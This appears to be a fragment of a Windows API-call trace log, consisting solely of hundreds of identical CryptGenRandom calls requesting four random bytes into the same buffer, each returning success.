[0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 